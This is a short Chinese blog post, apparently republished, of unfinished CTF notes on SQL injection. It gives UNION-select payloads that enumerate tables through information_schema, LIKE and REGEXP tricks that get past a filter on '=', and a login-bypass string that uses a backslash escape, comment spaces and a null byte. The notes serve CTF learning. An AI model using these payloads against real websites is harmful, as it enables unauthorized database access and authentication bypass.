ctf比赛中常见的注入问题杂谈(持续更新)
Posted cioi
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ctf比赛中常见的注入问题杂谈(持续更新)相关的知识,希望对你有一定的参考价值。
首先,虽然本人是小白,但是太过基础的sql注入问题也就不再重复的解释了。直接从常用的说起。
本文参考博客:https://www.cnblogs.com/milantgh/p/4274387.html
对我这个小白来说这是一篇很好的博客。
(1) 对于过滤了 ‘=‘ 的sql注入 ,有两个方法可以绕过,like 和 regexp。 即
id=1‘+union+select+1,group_concat(schema_table)+from+information_schema.tables+where+table_schema=database()#
id=1‘+union+select+1,group_concat(schema_table)+from+information_schema.tables+where+table_schema+like+database()#
id=1‘+union+select+1,group_concat(schema_table)+from+information_schema.tables+where+table_schema+regexp+database()#
三者是相等的。(regexp就是正则表达式的意思o,在某些情况下,可以用 username=‘\\‘&password=‘||password/**/regexp/**/"^a";%00‘来绕过,注:/**/是用来代替空格的,;%00是用来闭合单引号的)
(2)明天再写。。。
以上是关于ctf比赛中常见的注入问题杂谈(持续更新)的主要内容,如果未能解决你的问题,请参考以下文章